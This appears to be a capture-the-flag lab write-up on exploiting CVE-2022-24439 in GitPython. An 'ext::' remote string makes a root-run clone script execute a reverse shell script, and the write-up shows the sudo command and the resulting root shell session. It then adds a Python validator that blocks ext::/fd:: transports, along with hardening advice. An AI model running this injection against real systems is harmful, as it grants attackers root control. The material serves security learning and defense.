CVE-2022-24439


A vulnerability has been found in gitpython (Programming Language Software) (version unknown) and classified as problematic. This vulnerability affects an unknown function. The manipulation with an unknown input leads to an input validation vulnerability. The CWE definition for the vulnerability is CWE-20: the product receives input or data, but it does not validate, or incorrectly validates, that the input has the properties required to process the data safely and correctly. As an impact it is known to affect confidentiality, integrity, and availability.

Exploitation


prod@editorial:/dev/shm$ nano r.sh

I can just create a reverse shell script at /dev/shm/r.sh

prod@editorial:/dev/shm$ sudo -u root /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::/dev/shm/r.sh"

and call the reverse shell script via the ext transport protocol.

┌──(kali㉿kali)-[~/archive/htb/labs/editorial]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.141] from (UNKNOWN) [10.10.11.20] 34134
# whoami
root
# hostname
editorial
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:20:11 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    altname ens160
    inet 10.10.11.20/23 brd 10.10.11.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:2011/64 scope global dynamic mngtmpaddr 
       valid_lft 86398sec preferred_lft 14398sec
    inet6 fe80::250:56ff:feb9:2011/64 scope link 
       valid_lft forever preferred_lft forever
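The root cause above is that the clone script hands a caller-controlled remote straight to GitPython, which passes it to git, and git's `ext::` remote helper runs the rest of the value as a command. The following is an added example (not code from the write-up or from GitPython) of the input validation that CWE-20 calls for: an allow-list check placed in front of `Repo.clone_from()` so that values like `ext::/dev/shm/r.sh` are refused before git sees them. The helper name `safe_remote_url`, the scheme allow-list and the sample URLs are assumptions made for this example; the `ext::`/`fd::` prefixes are the ones GitPython 3.1.30 began rejecting unless `allow_unsafe_protocols` is set.

```python
"""
Added example, not part of the original write-up or of GitPython:
validate a remote URL before it reaches Repo.clone_from().
"""
import re
from urllib.parse import urlparse

# Transports that make git execute a local command (ext::) or attach to an
# arbitrary file descriptor (fd::). GitPython >= 3.1.30 refuses these by
# default; this check applies the same rule regardless of the version in use.
UNSAFE_TRANSPORTS = ("ext::", "fd::")

# Network-only schemes a clone service is expected to accept (assumed list).
ALLOWED_SCHEMES = {"https", "ssh", "git"}

# scp-like syntax "user@host:path" is valid for git but not understood by
# urlparse, so it is matched separately.
_SCP_LIKE = re.compile(r"^[A-Za-z0-9._-]+@[A-Za-z0-9.-]+:[^/].*$")


def safe_remote_url(url: str) -> bool:
    """Return True only when `url` uses an expected, network-only transport."""
    if not isinstance(url, str) or not url.strip():
        return False
    url = url.strip()
    # A leading '-' would let the value be parsed as a git command-line option.
    if url.startswith("-"):
        return False
    # Case-insensitive check for the known unsafe transport prefixes.
    if url.lower().startswith(UNSAFE_TRANSPORTS):
        return False
    # Any "<helper>::" prefix before the first "/" invokes a remote helper;
    # reject the whole family rather than only the two names listed above.
    if "::" in url.split("/", 1)[0]:
        return False
    if _SCP_LIKE.match(url):
        return True
    parsed = urlparse(url)
    return parsed.scheme in ALLOWED_SCHEMES and bool(parsed.netloc)


def clone_allowed(url: str, dest: str) -> bool:
    """Gate for a clone job: True if `url` may be cloned into `dest`.

    The actual Repo.clone_from(url, dest) call is deliberately left out so
    the check can be exercised without git installed; a service would only
    call it when this function returns True.
    """
    return safe_remote_url(url) and bool(dest)


if __name__ == "__main__":
    # Constructed sample inputs: the exploit string from this write-up and
    # a few ordinary remotes.
    for candidate in (
        "ext::/dev/shm/r.sh",
        "https://github.com/gitpython-developers/GitPython.git",
        "git@github.com:gitpython-developers/GitPython.git",
    ):
        print(f"{candidate!r:60} allowed={safe_remote_url(candidate)}")
```

A defender can also cap the blast radius outside the application: git's own `protocol.ext.allow` and `protocol.allow` settings refuse the `ext::` helper at the git level, and the clone script should not need to run as root through `sudo` in the first place.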

System Level Compromise